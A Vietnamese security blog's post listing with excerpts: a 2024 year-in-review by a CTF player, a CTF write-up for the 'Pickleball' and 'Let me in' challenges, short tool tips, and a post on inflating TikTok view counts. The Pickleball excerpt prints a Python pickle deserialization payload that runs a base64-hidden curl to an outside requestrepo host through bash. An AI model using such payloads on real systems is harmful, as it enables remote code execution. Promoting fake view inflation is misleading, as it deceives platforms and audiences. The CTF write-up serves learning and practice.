Bài đăng

Đang hiển thị bài đăng từ Tháng 12, 2024

Tanr man 2024

 Tản mạn về năm 2024 của Spycio.Kon Một số thành tích nổi bật trong năm - Tự tay host một ctf nhỏ cho team từ A-Z - Tham gia kì thi lấy chứng chỉ quốc tế với tổng thiệt hại là hơn 500$, 20 ngày mất ngủ và 3 tháng ôn tập (mình được một anh đẹp zai hỗ trợ thi hihi), mặc dù chỉ được 2/3 chặng đường (fail) T__T. Em xin lỗi anh rất nhiều. - Đã giải được một số challenges ở một số giải ctf mà năm trước mình khó có thể giải được - Đã viết POC cho một số CVE mình chơi và được một số trang web crawl trúng, khá vui ^^ https://cve.imfht.com/poc_detail/75cc08888950aec9e37a3c206652083d271746e4 https://cvefeed.io/vuln/detail/CVE-2023-41425 https://154.17.20.211 - Nói chuyện được với một số idol quốc tế như IRELAND WITHOUT RE, Microsoft/Synack redteamer/bug hunter,... - Đã viết trên Viblo và cảm thấy bản thân đã có những đóng góp cho cộng đồng lập trình viên trong và ngoài nước mặc dù nó không có gì nhiều =))) https://viblo.asia/p/huong-dan-tao-discord-bot-bang-lm-studio-3kY4g0pyJAe https://viblo...
Hình ảnh
Here is my solution for  Pickleball and Letmein challenges. :< My team planned to join this ctf, but it seems everyone is busy. So sad. Btw thx authors for the great challenges  ---------------------------------------------------------------------------------------------------------------------------- Pickleball: You can refer to the use of opcodes for bypassing,  https://laxiisteam.blogspot.com/2023/09/kma-thi-sinh-vien-attt-cap-hoc-vien-he.html or just run my script    import base64 import pickle payload = b """(cos system S'echo Y3VybCBwamZ3MmxwNS5yZXF1ZXN0cmVwby5jb20=|base64 -d|bash' o""" ab = base64.b64encode(payload) print (ab)  Let me in: This black box challenge has 0 solves. I’ve never worked with Ruby on Rails before, so I encountered quite a few difficulties. Here’s how I approached it  Giao diện nó đây, có 2 chức năng dễ thấy là signup và signin Wappalyzer cho thấy backend có khả năng được viết bằng Ruby Step1: Path travesal View...

CPS

 https://nhienit.wordpress.com/2020/12/03/tim-hieu-ve-csp-content-security-policy/
 Xóa node_modules trong các dự án ko cần  npx npkill

MMO - Black huntres

Hình ảnh
 Hello xin chào mọi người, dạo này mình cũng đang lấn sang mảng MMO nên cũng muốn share mấy cái tips/tricks cho mọi người. Bài 1: Buff view toptop Mọi người đang bài thường bị flop à, không sao. Tool này sẽ giúp mọi người đẩy số view lên. Điền username toptop vô đây Sau đó đợi 1 lát, nhập capcha và đợi Mình buff view nên chỉ cần này thôi Rồi ok làm theo các bước tự buff là ok. Chờ 15p mỗi lần nhé <(")